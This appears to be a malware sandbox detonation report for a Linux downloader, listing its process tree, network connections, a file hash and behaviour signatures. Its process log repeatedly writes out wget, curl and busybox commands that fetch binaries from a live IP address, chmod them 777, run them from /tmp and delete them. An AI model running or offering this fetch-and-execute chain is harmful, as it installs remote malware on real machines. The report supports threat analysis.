/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/wget
[wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 03:24
Reported
2024-10-28 03:27
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
11s
Max time network
131s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
